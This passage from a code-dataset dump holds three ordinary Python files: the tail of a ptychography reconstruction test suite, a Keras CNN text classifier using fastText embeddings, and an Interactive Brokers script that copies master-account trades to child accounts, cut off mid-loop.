self.probe,\n self.original,\n ]\n with lzma.open(dataset_file, 'wb') as file:\n pickle.dump(setup_data, file)\n\n def setUp(self):\n \"\"\"Load a dataset for reconstruction.\"\"\"\n dataset_file = os.path.join(testdir, 'data/ptycho_setup.pickle.lzma')\n if not os.path.isfile(dataset_file):\n self.create_dataset(dataset_file)\n with lzma.open(dataset_file, 'rb') as file:\n [\n self.data,\n self.scan,\n self.probe,\n self.original,\n ] = pickle.load(file)\n\n def test_consistent_simulate(self):\n \"\"\"Check ptycho.simulate for consistency.\"\"\"\n data = tike.ptycho.simulate(\n detector_shape=self.data.shape[-1],\n probe=self.probe,\n scan=self.scan,\n psi=self.original,\n fly=self.scan.shape[-2] // self.data.shape[-3],\n )\n assert data.dtype == 'float32', data.dtype\n assert self.data.dtype == 'float32', self.data.dtype\n np.testing.assert_array_equal(data.shape, self.data.shape)\n np.testing.assert_allclose(np.sqrt(data), np.sqrt(self.data), atol=1e-6)\n\n def error_metric(self, x):\n \"\"\"Return the error between two arrays.\"\"\"\n return np.linalg.norm(x - self.original)\n\n def template_consistent_algorithm(self, algorithm, params={}):\n \"\"\"Check ptycho.solver.algorithm for consistency.\"\"\"\n\n if params.get('use_mpi') is True:\n with MPIComm() as IO:\n self.scan, self.data = IO.MPIio(self.scan, self.data)\n\n result = {\n 'psi': np.ones_like(self.original),\n 'probe': self.probe * np.random.rand(*self.probe.shape),\n 'scan': self.scan,\n }\n result = tike.ptycho.reconstruct(\n **result,\n **params,\n data=self.data,\n algorithm=algorithm,\n num_iter=1,\n )\n params.update(result)\n result = tike.ptycho.reconstruct(\n **params,\n data=self.data,\n algorithm=algorithm,\n num_iter=32,\n # Only works when probe recovery is false because scaling\n )\n print()\n cost = '\\n'.join(f'{c:1.3e}' for c in result['cost'])\n print(cost)\n try:\n import matplotlib.pyplot as plt\n fname = os.path.join(testdir, 'result', f'{algorithm}')\n os.makedirs(fname, exist_ok=True)\n for i in range(len(self.original)):\n plt.imsave(\n f'{fname}/{i}-phase.png',\n np.angle(result['psi'][i]),\n )\n plt.imsave(\n f'{fname}/{i}-ampli.png',\n np.abs(result['psi'][i]),\n )\n for i in range(self.probe.shape[-3]):\n plt.imsave(\n f'{fname}/{i}-probe-phase.png',\n np.angle(result['probe'][0, 0, 0, i]),\n )\n plt.imsave(\n f'{fname}/{i}-probe-ampli.png',\n np.abs(result['probe'][0, 0, 0, i]),\n )\n except ImportError:\n pass\n\n def test_consistent_cgrad(self):\n \"\"\"Check ptycho.solver.cgrad for consistency.\"\"\"\n self.template_consistent_algorithm(\n 'cgrad',\n params={\n 'subset_is_random': True,\n 'batch_size': int(self.data.shape[1] / 3),\n 'num_gpu': 2,\n 'recover_probe': True,\n 'recover_psi': True,\n 'use_mpi': True,\n },\n )\n\n # def test_consistent_admm(self):\n # \"\"\"Check ptycho.solver.admm for consistency.\"\"\"\n # self.template_consistent_algorithm('admm')\n\n def test_consistent_lstsq_grad(self):\n \"\"\"Check ptycho.solver.lstsq_grad for consistency.\"\"\"\n self.template_consistent_algorithm(\n 'lstsq_grad',\n params={\n 'subset_is_random': True,\n 'batch_size': int(self.data.shape[1] / 3),\n 'num_gpu': 2,\n 'recover_probe': True,\n 'recover_psi': True,\n 'use_mpi': False,\n },\n )\n\n def test_consistent_lstsq_grad_variable_probe(self):\n \"\"\"Check ptycho.solver.lstsq_grad for consistency.\"\"\"\n\n eigen_probe = tike.random.numpy_complex(\n *self.scan.shape[:-2], 1, 1, 2,\n *self.probe.shape[-2:]).astype('complex64')\n weights = 1e-6 * np.random.rand(*self.scan.shape[:-1], *\n eigen_probe.shape[-4:-2])\n weights -= np.mean(weights, axis=-3, keepdims=True)\n weights = weights.astype('float32')\n\n self.template_consistent_algorithm(\n 'lstsq_grad',\n params={\n 'subset_is_random': True,\n 'batch_size': int(self.data.shape[1] / 3),\n 'num_gpu': 2,\n 'recover_probe': True,\n 'recover_psi': True,\n 'eigen_probe': eigen_probe,\n 'eigen_weights': weights,\n },\n )\n\n def test_invaid_algorithm_name(self):\n \"\"\"Check that wrong names are handled gracefully.\"\"\"\n with self.assertRaises(ValueError):\n self.template_consistent_algorithm('divided')\n\n\nclass TestProbe(unittest.TestCase):\n\n def test_eigen_probe(self):\n\n leading = (2,)\n wide = 18\n high = 21\n posi = 53\n eigen = 1\n comm = Comm(2, None)\n\n R = comm.pool.bcast(np.random.rand(*leading, posi, 1, 1, wide, high))\n eigen_probe = comm.pool.bcast(np.random.rand(*leading,\n 1, eigen, 1, wide, high))\n weights = np.random.rand(*leading, posi)\n weights -= np.mean(weights)\n weights = comm.pool.bcast(weights)\n patches = comm.pool.bcast(np.random.rand(*leading,\n posi, 1, 1, wide, high))\n diff = comm.pool.bcast(np.random.rand(*leading,\n posi, 1, 1, wide, high))\n\n new_probe, new_weights = tike.ptycho.probe.update_eigen_probe(\n comm=comm,\n R=R,\n eigen_probe=eigen_probe,\n weights=weights,\n patches=patches,\n diff=diff,\n )\n\n assert eigen_probe[0].shape == new_probe[0].shape\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_ptycho.py","file_name":"test_ptycho.py","file_ext":"py","file_size_in_byte":14423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"602369152","text":"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nimport numpy as np\nimport pandas as pd\nfrom keras import layers\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Dropout, Activation, LSTM\nfrom keras.layers import Input, Flatten, merge, Lambda, Dropout, SpatialDropout1D\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.layers.wrappers import TimeDistributed, Bidirectional\nfrom keras.utils import np_utils, to_categorical\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding\nfrom keras.layers.normalization import BatchNormalization\n\n\nfrom sklearn.model_selection import train_test_split, KFold, GridSearchCV, StratifiedShuffleSplit,StratifiedKFold\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n\n\n\nimport gensim\nfrom gensim.models import Word2Vec\nfrom gensim.utils import simple_preprocess\n\nfrom gensim.models.keyedvectors import KeyedVectors\n\nfrom keras_self_attention import SeqSelfAttention\n# import matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\nimport itertools\n\n\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import RegexpTokenizer\n\n\n\nfrom sklearn.utils import shuffle\n\n\n\n\n#%%\n#==============================================================================\n# Load the dataset\n#==============================================================================\n\ndata = open(\"Dataset_Fiek_5.0.txt\", encoding=\"utf-8\").read()\ny, docs = [], []\nfor i, line in enumerate(data.split(\"\\n\")):\n content = line.split(\"\\t\")\n docs.append(content[0])\n y.append(content[1])\n\n\n\n\n#%%\n#==============================================================================\n# Encode class values as integers \n#==============================================================================\nencoder = LabelEncoder()\n\nencoder.fit(y)\n\nencoded_y = encoder.transform(y)\n\n# convert integers to dummy variables (i.e. one hot encoded)\ndummy_y = np_utils.to_categorical(encoded_y)\n\n\n\n#%%\n#==============================================================================\n# Define plot_history function\n#==============================================================================\ndef plot_history(history):\n loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' not in s]\n val_loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' in s]\n acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' not in s]\n val_acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' in s]\n \n if len(loss_list) == 0:\n print('Loss is missing in history')\n return \n \n ## As loss always exists\n epochs = range(1,len(history.history[loss_list[0]]) + 1)\n \n ## Loss\n plt.figure(1)\n for l in loss_list:\n plt.plot(epochs, history.history[l], 'b', label='Training loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))\n for l in val_loss_list:\n plt.plot(epochs, history.history[l], 'g', label='Validation loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))\n \n plt.title('Loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n \n ## Accuracy\n plt.figure(2)\n for l in acc_list:\n plt.plot(epochs, history.history[l], 'b', label='Training accuracy (' + str(format(history.history[l][-1],'.5f'))+')')\n for l in val_acc_list: \n plt.plot(epochs, history.history[l], 'g', label='Validation accuracy (' + str(format(history.history[l][-1],'.5f'))+')')\n\n plt.title('Accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.show()\n\n\n\n\n#==============================================================================\n# plot confusion_matrix function\n#==============================================================================\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n title='Normalized confusion matrix'\n else:\n title='Confusion matrix'\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.show()\n \n \n\n#==============================================================================\n# Define full_multiclass_report which prints classification report\n#============================================================================== \n## If binary (sigmoid output), set binary parameter to True\ndef full_multiclass_report(model,\n x,\n y_true,\n classes,\n batch_size=64,\n binary=False):\n\n # 1. Transform one-hot encoded y_true into their class number\n if not binary:\n y_true = np.argmax(y_true,axis=1)\n \n # 2. Predict classes and stores in y_pred\n y_pred = model.predict_classes(x, batch_size=batch_size)\n \n # 3. Print accuracy score\n print(\"Accuracy : \"+ str(accuracy_score(y_true,y_pred)))\n \n print(\"\")\n \n # 4. Print classification report\n print(\"Classification Report\")\n print(classification_report(y_true,y_pred,digits=4)) \n \n \n # 5. Plot confusion matrix\n cnf_matrix = confusion_matrix(y_true,y_pred)\n print(cnf_matrix)\n plot_confusion_matrix(cnf_matrix,classes=classes)\n\n#==============================================================================\n# Input parameters\n#==============================================================================\nMAX_SEQUENCE_LENGTH = 20\nMAX_NB_WORDS = 20000\nEMBEDDING_DIM = 300\n\n\n#==============================================================================\n# Create a tokenizer\n#==============================================================================\n\n\ntokenizer = Tokenizer(nb_words=MAX_NB_WORDS, lower=True )\n\ntokenizer.fit_on_texts(docs)\n\nsequences = tokenizer.texts_to_sequences(docs)\n\nword_index = tokenizer.word_index\n\nprint('Found %s unique tokens.' % len(word_index))\n\n# convert text to sequence of tokens and pad them to ensure equal length vectors \nx = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)\n\n\n\n#==============================================================================\n# Training, testing and validation\n#==============================================================================\nseed =1000\n\nx_train, x_test, y_train, y_test = train_test_split(x, dummy_y, train_size=0.7, random_state=seed)\n\nx_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size=0.7, random_state=seed)\n\n\n\n\n#==============================================================================\n# Pretrained FastText embeddings\n#==============================================================================\nprint('loading FastText word embeddings...')\n\nembeddings_index = {}\nwords_not_found=[]\nf=open (\"cc.sq.300.vec\", \"r\", encoding=\"utf-8\")\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\nf.close()\n\nprint('Found %s word vectors.' % len(embeddings_index))\n\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = embedding_vector\n else:\n words_not_found.append(word)\nprint('Number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\n\n\n'''\n\n#==============================================================================\n# Pretrained word2vec embeddings\n#==============================================================================\nword_vectors = KeyedVectors.load_word2vec_format('/Users/zekaaa/Documents/WIMS_2019/GoogleNews-vectors-negative300.bin', binary=True)\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n if i>=MAX_NB_WORDS:\n continue\n try:\n embedding_vector = word_vectors[word]\n embedding_matrix[i] = embedding_vector\n except KeyError:\n embedding_matrix[i]=np.random.normal(0,np.sqrt(0.25),EMBEDDING_DIM)\nprint('Found %s word vectors.' % len(word_vectors.vocab))\ndel(word_vectors)\n\n\n\n#==============================================================================\n# Pretrained Glove embeddings\n#==============================================================================\nembeddings_index = {}\nwords_not_found=[]\nf=open (\"/Users/zekaaa/Documents/WIMS_2019/glove.6B/glove.6b.300d.txt\", \"r\", encoding=\"utf-8\")\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\nf.close()\n\nprint('Found %s word vectors.' % len(embeddings_index))\n\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = embedding_vector\n else:\n words_not_found.append(word)\nprint('Number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0)) \n\n'''\n\n#==============================================================================\n# Build CNN model\n#==============================================================================\nimport keras\n\n\nCNN_Model = Sequential()\n\n'''\n\nCNN_Model.add(layers.Embedding(len(word_index), EMBEDDING_DIM, input_length=MAX_SEQUENCE_LENGTH))\n\n'''\n # Pretrained word2vec and Glove embeddings\nCNN_Model.add(layers.Embedding(len(word_index) + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=False))\n\n\n\nCNN_Model.add(SpatialDropout1D(0.3))\nCNN_Model.add(layers.Conv1D(512, 3, activation='relu'))\n\n\nCNN_Model.add(SeqSelfAttention(attention_width=8, attention_activation='sigmoid', name='Attention',))\n\nCNN_Model.add(layers.GlobalMaxPooling1D())\n\n\n\n\nCNN_Model.add(layers.Dense(3, activation='softmax'))\n\nCNN_Model.compile(loss='categorical_crossentropy',optimizer='adam', metrics=['accuracy'])\n\nCNN_Model.summary()\n\n\n#==============================================================================\n# Evaluate model and print results\n#==============================================================================\n\nCNN_History=CNN_Model.fit(x_train, y_train, epochs = 35, batch_size = 256,verbose=1, validation_data=(x_val,y_val), shuffle=True)\n\nplot_history(CNN_History)\n\nfull_multiclass_report(CNN_Model, x_val, y_val, encoder.inverse_transform(np.arange(3)))\n\n\n\n\n","sub_path":"Classifiers/1D_CNN_fastText.py","file_name":"1D_CNN_fastText.py","file_ext":"py","file_size_in_byte":11853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"61050584","text":"from ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nfrom ibapi.order import *\nfrom datetime import datetime\n\nimport threading\nimport time\nimport json\n\n\nclass IBapi(EWrapper, EClient):\n def __init__(self, client_id):\n EClient.__init__(self, self)\n self.client_id = client_id\n\n def nextValidId(self, orderId: int):\n super().nextValidId(orderId)\n self.nextorderId = orderId\n print('The next valid order id is: ', self.nextorderId)\n\n def updateAccountValue(self, key: str, val: str, currency: str, accountName: str):\n super().updateAccountValue(key, val, currency, accountName)\n # print(\"UpdateAccountValue. Key:\", key, \"Value:\", val,\"Currency:\", currency, \"AccountName:\", accountName)\n\n def updatePortfolio(self, contract: Contract, position: float, marketPrice: float, marketValue: float, averageCost: float, unrealizedPNL: float, realizedPNL: float, accountName: str):\n super().updatePortfolio(contract, position, marketPrice, marketValue,averageCost, unrealizedPNL, realizedPNL, accountName)\n \n if self.client_id == 0: #master update positions size\n try:\n master_details['positions'][contract.symbol] = position\n except:\n master_details['positions'] = {contract.symbol: position}\n pass\n # Master ID\n else:\n try:\n child_details[self.client_id - 1]['positions'][contract.symbol] = position #child update positions size based on clientID\n except:\n child_details[self.client_id - 1]['positions'] = {contract.symbol: position}\n \n for child in child_details: #gets the difference in dict to find positions not the same\n A = list(child['positions'].keys())\n B = list(master_details['positions'].keys())\n commonKeys = set(A) - (set(A) - set(B))\n for key in commonKeys:\n if((child['positions'][key]) * child['risk_divide'] != (master_details['positions'][key])):\n print(key ,\":\" ,(child['positions'][key]) , \" should be \" , (master_details['positions'][key]), \"risk mul:\", child['risk_divide'])\n \n if((child['positions'][key]) > 0 and master_details['positions'][key] > 0 ): #give binary to child\n child['binary_indicator'][key] = [0,0]\n if((child['positions'][key]) > 0 and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [0,1]\n if((child['positions'][key]) < 0 and master_details['positions'][key] > 0 ):\n child['binary_indicator'][key] = [1,0]\n if((child['positions'][key]) < 0 and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [1,1]\n\n if((child['positions'][key]) * child['risk_divide'] == (master_details['positions'][key])): \n child['binary_indicator'][key] = None\n\n for child in child_details:\n print(json.dumps(child['binary_indicator']))\n print(json.dumps(child['positions']))\n\n # print(\"UpdatePortfolio.\", \"Symbol:\", contract.symbol, \"SecType:\", contract.secType, \"Exchange:\", contract.exchange, \"Position:\", position, \"MarketPrice:\", marketPrice,\n # \"MarketValue:\", marketValue, \"AverageCost:\", averageCost,\n # \"UnrealizedPNL:\", unrealizedPNL, \"RealizedPNL:\", realizedPNL,\n # \"AccountName:\", accountName)\n\n def updateAccountTime(self, timeStamp: str):\n super().updateAccountTime(timeStamp)\n # print(\"UpdateAccountTime. Time:\", timeStamp)\n\n def accountDownloadEnd(self, accountName: str):\n super().accountDownloadEnd(accountName)\n print(\"AccountDownloadEnd. Account:\", accountName)\n # child_details[0]['all_positions']['FB']= 9.0\n # for child in child_details:\n # print(accountName,child[\"account_name\"],\";\",json.dumps(child['all_positions']))\n \n\n def orderStatus(self, orderId, status, filled, remaining, avgFullPrice, permId, parentId, lastFillPrice, clientId, whyHeld, mktCapPrice):\n # need to code cancelling orders here based on orderid (but need to first store pairs)\n print('orderStatus - orderid:', orderId, 'status:', status, 'filled', filled, 'remaining', remaining, 'lastFillPrice', lastFillPrice, 'clientid', clientId)\n \n if status == 'Cancelled' and orderId < 0:\n for child in child_details:\n for child_order_list in child['order_list']:\n if orderId in child_order_list:\n print(f'Cancelling Master Order Number {orderId}')\n print(f'Matching Child Order {child_order_list[0]}')\n child['app'].cancelOrder(child_order_list[0])\n \n \n def openOrder(self, orderId, contract, order, orderState):\n # Keagan Edit\n # When this is triggered can try to create order to other clients\n # print('openOrder id:', orderId, contract.symbol, contract.secType, '@', contract.exchange, ':', order.action, order.orderType, order.totalQuantity, orderState.status) \n order_str = f'Open Order to Child:\\n' + \\\n f'Master Order ID: {orderId}\\n' + \\\n f'Symbol: {contract.symbol} [ {contract.secType} @ {contract.exchange} ]\\n' + \\\n f'Action: {order.action} {order.totalQuantity} [{order.orderType}]\\n' + \\\n f'Status: {orderState.status}\\n\\n'\n totalQ = order.totalQuantity\n # # if orderState.status == 'PreSubmitted':\n # # pass\n # else:\n for child in child_details:\n if isinstance(child['app'].nextorderId, int) and orderId < 0:\n print(f'Manual Order Number {orderId} Received')\n if not have_order(child['order_list'], orderId):\n child['order_list'].append( [child['app'].nextorderId, orderId] )\n print(f'Child [{child[\"ip_address\"]}]: Manual Order ID {orderId} paired with {child[\"app\"].nextorderId}')\n print(f'Current Order Type: {order.orderType}')\n print(child['order_list'], '\\n\\n\\n')\n TQ = order.totalQuantity \n if contract.secType == \"STK\":\n if (contract.symbol in (child['binary_indicator'].keys())): #search dict for contract\n print('Found binary indicator')\n\n if (child['binary_indicator'].get(contract.symbol) == [0,0] or child['binary_indicator'].get(contract.symbol) == [1,1]): #if child has more position. Dont buy\n if((order.totalQuantity//child[\"risk_divide\"]) + (abs(master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) < abs(child['positions'].get(contract.symbol))):\n break\n\n if (order.action == 'BUY'):\n print(child['binary_indicator'].get(contract.symbol))\n\n if (child['binary_indicator'].get(contract.symbol) == [0,0]):\n if((order.totalQuantity//child[\"risk_divide\"]) + (master_details['positions'].get(contract.symbol)//child[\"risk_divide\"]) > child['positions'].get(contract.symbol)):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + (master_details['positions'].get(contract.symbol)//child[\"risk_divide\"]) - child['positions'].get(contract.symbol)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n \n if (child['binary_indicator'].get(contract.symbol) == [0,1]):\n if(order.totalQuantity <= abs(master_details['positions'].get(contract.symbol))):\n OA = order.action\n OT = order.orderType\n order.action = 'SELL'\n order.orderType = \"MKT\"\n order.totalQuantity = abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.action = OA\n order.orderType = OT\n order.totalQuantity = totalQ\n\n if (child['binary_indicator'].get(contract.symbol) == [1,0]):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + abs((master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) + abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n print('CBCBCBBCBCBCBCBBCBC', child['positions'].get(contract.symbol))\n\n if (child['binary_indicator'].get(contract.symbol) == [1,1]):\n if(TQ <= abs((master_details['positions'].get(contract.symbol)))):\n TQ = child['positions'].get(contract.symbol) * (TQ/master_details['positions'].get(contract.symbol))\n order.totalQuantity = round(TQ)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n if(order.totalQuantity > abs(master_details['positions'].get(contract.symbol))):\n order.totalQuantity = ((order.totalQuantity - abs(master_details['positions'].get(contract.symbol)))//child[\"risk_divide\"]) + abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n\n\n\n if(order.action == 'SELL'):\n\n if(child['binary_indicator'].get(contract.symbol) == [0,0]):\n if(order.totalQuantity <= master_details['positions'].get(contract.symbol)):\n TQ = child['positions'].get(contract.symbol) * (TQ/master_details['positions'].get(contract.symbol))\n order.totalQuantity = round(TQ)\n print(\"testting\",TQ)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n if(order.totalQuantity > master_details['positions'].get(contract.symbol)):\n order.totalQuantity = ((order.totalQuantity - master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) + child['positions'].get(contract.symbol)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n\n if(child['binary_indicator'].get(contract.symbol) == [0,1]):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + abs((master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) + abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n\n if(child['binary_indicator'].get(contract.symbol) == [1,0]):\n if(order.totalQuantity <= abs(master_details['positions'].get(contract.symbol))):\n OA = order.action\n OT = order.orderType\n order.action = 'BUY'\n order.orderType = \"MKT\"\n order.totalQuantity = abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.action = OA\n order.orderType = OT\n order.totalQuantity = totalQ\n\n if(child['binary_indicator'].get(contract.symbol) == [1,1]):\n if((order.totalQuantity//child[\"risk_divide\"]) + (abs(master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) > abs(child['positions'].get(contract.symbol))):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + (abs(master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) - abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n \n if(child['positions'].get(contract.symbol) is None):\n if (order.action == 'SELL' and master_details['positions'].get(contract.symbol) > 0): #check opposite directions \n break\n\n if (order.action == 'BUY' and master_details['positions'].get(contract.symbol) < 0): #check opposite directions \n break\n\n else:\n order.totalQuantity //= child[\"risk_divide\"] \n child['app'].placeOrder(child['app'].nextorderId, contract, order) \n child['app'].reqIds(child['app'].nextorderId) \n order.totalQuantity = totalQ\n\n if(child['positions'].get(contract.symbol) is not None):\n if (order.action == 'SELL' and (child['positions'].get(contract.symbol) == 0 and child['positions'].get(contract.symbol) - order.totalQuantity//child[\"risk_divide\"] < 0 and master_details['positions'].get(contract.symbol)) > 0): #check opposite directions \n break\n\n if (order.action == 'BUY' and (child['positions'].get(contract.symbol) == 0 and child['positions'].get(contract.symbol) + order.totalQuantity//child[\"risk_divide\"] > 0 and master_details['positions'].get(contract.symbol)) < 0):\n print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')\n break\n\n else:\n order.totalQuantity //= child[\"risk_divide\"] #need to account for % mod values to prevent misallignment of position sizing (etc B>23 = 4child, B>22 = 4child. S> 22+23 = 45 = 9child. EXTRA ONE... so position -1 instead of 0)\n #regardless of -ve or +ve will reallign. if zero we go zero.\n \n #Wrote draft code in words. Will explain\n\n\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId) #reqID increments the next validId *some error.. the api calls this 3 times per trade i do. fking retard. might be because of the threading also. need to do some self check on -id\n order.totalQuantity = totalQ\n print(order_str)\n \n \n\n def execDetails(self, reqId, contract, execution):\n print('Order Executed: ', reqId, contract.symbol, contract.secType, contract.currency, execution.execId, execution.orderId, execution.shares, execution.lastLiquidity)\n\n# def buySwitch(x, totalQty, risk, CPOS, MPOS):\n# return {\n# '[0,0]': 1,\n# '[0,1]': 2,\n# '[1,0]': 1,\n# '[1,1]': 2\n# }.get(x, 9) # 9 is default if x not found (trying to use switch)\n \ndef have_order(child_list, orderId):\n if len(child_list) > 0:\n for order_pair in child_list:\n if orderId in order_pair:\n print(f'Order Number {orderId} Found!')\n return True\n return False\n \ndef child_connect(child_details):\n temp_app = IBapi(child_details['client_id'])\n temp_app.connect(child_details['ip_address'], child_details['port'], child_details['client_id'])\n temp_app.nextorderId = None\n \n temp_thread = threading.Thread(target=temp_app.run, daemon=True)\n temp_thread.start()\n time.sleep(3)\n \n while not isinstance(temp_app.nextorderId, int):\n print(f'Waiting for Child IP [{child_details[\"ip_address\"]}] Connection')\n time.sleep(1)\n print(f'Child IP [{child_details[\"ip_address\"]}] Connected')\n print(f'Child IP [{child_details[\"ip_address\"]}] Current Order: {temp_app.nextorderId}\\n\\n')\n \n return temp_app\n\n\n\nall_orders = []\n\n# Master TWS Settings\nmaster_details = {\n 'ip_address': '127.0.0.1',\n 'port': 7498,\n 'client_id': 0,\n 'account_name' : None,\n 'positions' : {}\n}\n\nmaster_app = IBapi(master_details['client_id'])\nmaster_app.connect(master_details['ip_address'], master_details['port'], master_details['client_id'])\nmaster_app.nextorderId = None\n\nmaster_thread = threading.Thread(target=master_app.run, daemon=True)\nmaster_thread.start()\ntime.sleep(3)\n\n# While there is no instance, continue while loop\nwhile not isinstance(master_app.nextorderId, int):\n print('Waiting for Master Connection')\n time.sleep(1)\nprint('Master Connected')\nprint(f'Master Current Order: {master_app.nextorderId}')\n\n\n# Child TWS Settings\n\nchild_details = [\n {\n 'ip_address': '220.255.254.206',\n 'port': 7499,\n 'client_id': 1,\n 'account_name' : None,\n 'risk_divide' : 5,\n \"positions\": {},\n 'binary_indicator' : {}\n },\n {\n 'ip_address': '127.0.0.1',\n 'port': 7501,\n 'client_id': 2,\n 'account_name' : None,\n 'risk_divide' : 10,\n \"positions\": {},\n 'binary_indicator' : {}\n }\n]\n\nfor i, child_det in enumerate(child_details):\n child_details[i]['app'] = child_connect(child_det)\n child_details[i]['order_list'] = []\n\nmaster_app.reqAutoOpenOrders(True) #this allows to know what orders are placed because orderid will show up -ve\n\nfor child in child_details:\n child['app'].reqAccountUpdates(True, child['app'].clientId)\n\nmaster_app.reqAccountUpdates(True, master_app.clientId)# request postions will call updatePortfolio()\n\ntime.sleep(3)\n\nfor child in child_details: #gets the difference in dict to find positions not the same\n A = list(child['positions'].keys())\n B = list(master_details['positions'].keys())\n commonKeys = set(A) - (set(A) - set(B))\n for key in commonKeys:\n if((child['positions'][key]) * child['risk_divide'] != (master_details['positions'][key])):\n print(key ,\":\" ,(child['positions'][key]) , \" should be \" , (master_details['positions'][key]), \"risk mul:\", child['risk_divide'])\n \n if((child['positions'][key]) > 0 and master_details['positions'][key] > 0 ): #give binary to child\n child['binary_indicator'][key] = [0,0]\n \n if((child['positions'][key]) > 0 